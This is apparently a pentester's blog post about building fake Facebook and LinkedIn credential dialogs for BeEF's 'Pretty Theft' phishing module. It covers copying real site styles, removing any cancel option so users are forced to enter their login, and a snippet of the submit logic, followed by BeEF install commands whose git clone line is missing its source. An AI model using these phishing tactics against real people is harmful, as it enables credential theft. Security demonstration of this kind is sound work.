I'd say the most important aspect of effective phishing, or social engineering of any kind, is being convincing. By making your malicious activity as realistic as possible, the user will assume it's perfectly normal and happily go along with it.

To achieve this I focused on getting as close as I could to the real styles used by Facebook and LinkedIn. I used a combination of info from the web/forums/blogs etc. and also inspection of the actual website code, using the browser's built-in developer tools. In Chrome you just right-click any page element and select "Inspect element" and bam, you get the code. Super useful for borrowing code and styles.

The second aspect I focused on was the module logic and how the user interacts with the dialog box. Most legitimate dialog boxes give you two choices: continue or cancel. To ensure the user interacted with the div I only had a continue button; I didn't add a cancel button or any other way to close the box (for example, a cross in the top right-hand corner). This forces the user to confront the box and enter credentials. Another design choice was the verification of user input data. I added a check to ensure that the user has entered a username and password; if either is missing, an alert box prompts them to enter valid data. Every little bit helps when trying to scam that end user :)
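The input-handling logic described above boils down to a small predicate. A minimal sketch of that logic (the function name is mine, not from the module):

```javascript
// Sketch of the Pretty Theft submit decision: credentials are only sent when
// the button has been pressed AND both fields contain data. If the button was
// pressed with an empty field, the module instead resets the hidden flag and
// re-prompts the user with an alert.
function shouldSubmit(uname, pass, buttonPressed) {
  return buttonPressed === "true" && uname.length > 0 && pass.length > 0;
}
```

This is the check the one-second `checker` interval applies on every tick until it passes.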

Final Product: Real vs Fake

A real Facebook message box:

My fake Facebook dialog box:


If I get some time I'd like to improve the appearance of the pop-ups, add more pop-ups and clean up the code a bit. IE6 is not supported at the moment; it flat out refused to layer the divs. Border opacity was something I didn't end up finishing, as the child elements were inheriting the opacity, creating semi-visible pop-up boxes. I just needed to create a separate div for it, but there were some positioning issues. Definitely something that can be fixed, I was just too lazy :)

The BeEF framework brilliantly demonstrates how lethal even the smallest bit of javascript can be and how important it is to use NoScript. Through modules like Pretty Theft it's really easy to demonstrate the kinds of attacks organisations are facing today and how best to defend against them. If you've not played with BeEF before I suggest you go grab a copy. If you are using Backtrack, to make it work you first need to grab the latest version and then install bundler within the beef directory. Commands are below:

rm -rf /pentest/web/beef && git clone /pentest/web/beef

gem install --user-install bundler

As usual if you have any suggestions or questions feel free to comment below.